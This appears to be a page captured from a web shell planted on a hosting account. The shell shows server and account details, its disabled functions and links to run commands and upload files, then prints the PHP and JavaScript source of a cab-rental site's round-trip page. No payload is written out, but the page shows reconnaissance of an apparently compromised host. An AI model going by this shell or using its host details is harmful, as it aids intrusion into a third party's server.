Server IP : 82.112.239.40 / Your IP : 18.218.99.99 Web Server : LiteSpeed System : Linux in-mum-web1676.main-hosting.eu 5.14.0-503.35.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 4 05:23:43 EDT 2025 x86_64 User : u641149403 ( 641149403) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u641149403/domains/cabz4you.com/public_html/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include('include/common.php'); ?> <!DOCTYPE html> <html lang="en" style="overflow-x:hidden"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <meta name="msapplication-TileColor" content="#ffffff"> <meta name="msapplication-TileImage" content="../ms-icon-144x144.html"> <meta name="theme-color" content="#ffffff"> <title>Outstation - <?=SITE_NAME?></title> <?php include "include/header.php" ?> <style> .same-section-spacing { padding: 100px 0; } .same-section-spacings { padding: 50px 0; } .bg-banner { background: url(images/chopta_bredcrumb.jpg) no-repeat; background-size: cover; width: 100%; position: relative; } </style> <section class="same-section-spacing bg-banner"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="banner-box"> <h2></h2> <nav aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="index.php">Home</a></li> <li class="breadcrumb-item active" aria-current="page">Round Way</li> </ol> <h2 style="text-align: center;">Round Way</h2> <hr id="hr3" /> </nav> </div> </div> </div> </div> </section> <?php include('form.php'); ?> <div class="wrappercontent mt-1 pb-5"> <div class="block-title text-center"> <h2>Round Trip Cabs</h2> <hr id="hd" class="mx-auto" style="margin-top:10px;"> </div> <!-- Trending --> <div class="container-fluid"> <div class="row mt-4 p-4 text-justify"> <strong class="h4 w-100 text-left">Popular Routes of Outstation Cabs →</strong> <?php include('include/config.php'); $q = "select * from web_round_trip"; $query = mysqli_query($db,$q); while($res = mysqli_fetch_array($query)) { ?> <div class="col-md-3 mt-5"> <div class="card text-white card-has-bg click-col" style="background-image:url('admin/web-admin/<?php echo $res['image']?>');"> <div class="card-img-overlay d-flex flex-column"> <div class="card-body"> </div> <div class="card-footer"> <div class="media"> <div class="media-body"> <h6 class="my-0 text-white d-block"><?php echo $res['title']?></h6> </div> </div> </div> </div> </div> </div> <?php } ?> </div> </div> <!--End Trending --> <div class="container-fluid"> <div class="row bg-white bg-white p-4 text-justify"> <p></p> <p> A round trip or outstation trip has its mesmerizing pleasure while traveling from one city to another. And during this type of trip, outstation cab services may be the fastest and the most efficient that will fully connect you with nature on the way. For making travel in India, you can find various moments to roam from one destination to another and for those instances, Cabz 4 You fully supports to ride easily and fastest. Because, as the leading <strong>outstation car rental</strong> provider in India, we provide cab services for over a hundred cities across India. Traveling outer spots from a city is now very easy with Cabz 4 You by booking a cab with a well-experienced driver. With our car booking services in India, you will find a perfect option to explore nearby places easily and at affordable fare prices and would be able to get ultimate comfort and pleasure. </p> <h2><strong>Why Choose Cabz 4 You for Outstation Cabs?</strong></h2> <p> For outstation cab booking, Cabz 4 You offers the cheapest fare packages with the expert drivers who could fully assist in the way of your destination. For a round trip taxi, we will make available the best <strong>online outstation cab booking</strong> deals when visiting for the nearby spots. Whether for the hill station riding by car rental or heritage travel program, we fully assist for each of your plans. Also, you will get good assistance from the car driver to explore the city spots easily visiting during your outstation travel. And this way, you can create a great experience of your journey with Cabz 4 Youby booking variety of outstation cabs like Sedan, SUV, and Travelers. </p> </div> </div> </div> <script> $(function () { $("#sources").autocomplete({ source: "one-search.php", }); $("#desti").autocomplete({ source: "one-search.php", }); }); </script> <script defer> function getMonthName(a) { var e = ""; switch (a) { case 1: e = "Jan"; break; case 2: e = "Feb"; break; case 3: e = "Mar"; break; case 4: e = "Apr"; break; case 5: e = "May"; break; case 6: e = "Jun"; break; case 8: e = "Aug"; break; case 9: e = "Sep"; break; case 10: e = "Oct"; break; case 11: e = "Nov"; break; case 12: e = "Dec"; break; default: e = "Invalid"; } return e; } $(document).ready(function () { Date.prototype.addHours = function (t) { return this.setHours(this.getHours() + t), this; }; var e = new Date().addHours(2); (a = String(e.getDate()).padStart(2, "0")), (t = String(e.getMonth() + 1).padStart(2, "0")), (r = parseInt(e.getFullYear().toString().substr(2, 2), 10)), (n = 12 <= e.getHours() ? "PM" : "AM"), (s = e.getMinutes()), (c = e.getHours()), (b = (c = (c %= 12) || 12) + ":" + (s = s < 10 ? "0" + s : s) + " " + n), (todayDate = a + " " + getMonthName(parseInt(t)) + "'" + r + " - " + b); var d = ""; if (d == "") { $(".datepicker").val(todayDate); } var transfer_type = ""; 1 == transfer_type ? ($("#transfer_pick_div").removeClass("d-block"), $("#transfer_pick_div").addClass("d-none"), $("#transfer_drop_div").addClass("d-block")) : 2 == transfer_type && ($("#transfer_pick_div").addClass("d-block"), $("#transfer_drop_div").addClass("d-none"), $("#transfer_drop_div").removeClass("d-block")); var type = ""; if (type) { $.ajax({ url: "localities", type: "POST", data: { city_name: $("#transfer_source").val(), }, dataType: "JSON", success: function (response) { autocomplete(document.getElementById("transfer_drop"), response); autocomplete(document.getElementById("transfer_pick"), response); }, }); } var today = new Date(); var date = today.getFullYear() + "-" + (today.getMonth() + 1) + "-" + today.getDate(); $("#out_drop_date").datetimepicker({ format: "dd-M-yyyy", weekStart: 1, todayBtn: !0, autoclose: !0, todayHighlight: !0, startView: 2, minView: 2, forceParse: 0, startDate: date, pickerPosition: "bottom-left", }); var session_drop_date = ""; if (session_drop_date) { $("#out_drop_date").val(session_drop_date); } else { $("#out_drop_date").val(String(today.getDate()).padStart(2, "0") + " " + getMonthName(today.getMonth() + 1) + "'" + today.getFullYear().toString().substr(2, 2)); } $("#out_pick_date") .datetimepicker({ format: "dd-M-yyyy - HH:ii P", autoclose: !0, showMeridian: !0, todayBtn: !0, pickerPosition: "bottom-right", }) .on("changeDate", function (e) { var o = e.date; var i = new Date(e.date.valueOf()); $("#out_drop_date").datetimepicker("setStartDate", i), $("#out_drop_date").val(String(i.getDate()).padStart(2, "0") + " " + getMonthName(i.getMonth() + 1) + "'" + i.getFullYear().toString().substr(2, 2)); $("#out_drop_date").datetimepicker({ format: "dd-M-yyyy", weekStart: 1, todayBtn: !0, autoclose: !0, todayHighlight: !0, startView: 2, minView: 2, forceParse: 0, pickerPosition: "bottom-left", }); }); var destinations = ""; if (destinations) for (var strArray = destinations.split(" to "), k = 20, c = 0; c < strArray.length; c++) k++, $.ajax({ url: "cities_name", type: "POST", data: {}, dataType: "JSON", success: function (t) { autocomplete(document.getElementById("out_destination" + k.toString()), t.all_cities); }, }); $("#modify_outstation").on("shown.bs.modal", function () { $("body").css("padding-right", 0); }); $("#btn_oustation").click(function () { var ddate = $("#out_drop_date").val(); if (ddate == "") { $("#out_drop_date").focus(); $("#err_drop").text("Please enter drop date!"); return !1; } }); }); </script> <!-- ----------------- --> <script> $(function () { $("#states").autocomplete({ source: "search.php", }); }); </script> <script> $(function () { $("#sources").autocomplete({ source: "one-search.php", }); $("#desti").autocomplete({ source: "one-search.php", }); }); </script> <?php include "include/footer.php" ?>